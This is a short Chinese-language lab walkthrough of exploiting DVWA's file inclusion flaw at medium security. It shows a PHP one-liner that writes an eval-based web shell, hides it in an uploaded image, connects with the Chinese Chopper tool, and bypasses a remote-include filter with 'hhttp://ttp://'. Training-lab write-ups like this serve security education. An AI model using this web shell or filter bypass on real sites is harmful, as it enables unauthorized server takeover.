文件包含漏洞是由于对包含文件的判断不严格造成的,现在验证漏洞:
打开靶机,进入dvwa,安全选择中级
查看源码,
发现只对包含文件的url地址作了操作
local file include方式:
使用edjpgcom软件给图片写入恶意代码,通过include包含方式执行图片,生成木马文件,最后通过菜刀连接
准备一张图片,通过拖动图片到edjpgcom上的方式打开edjpgcom,写入恶意代码
<?fputs(fopen("shell1.php","w"),'<?php eval($_POST[123]);?>')?>
通过文件上传到web,
访问图片,发现可以访问
把图片路径复制到包含文件的位置
文件被成功执行
访问生成的文件shell1.php,发现没有报错,说明生成成功
使用中国菜刀连接
连接成功!
remote file include:
在另外一台服务器上制作木马文件,通过include方式执行该文件生成本地木马文件
分析源码发现替换了http://部分
可以在http://里面再写一个http://
如:hhttp://ttp:// 通过replace替换之后得到http://,就可以正常访问远程文件
把等级设置为h,再查看源码
发现判断方式变成了指定文件名称,相对安全。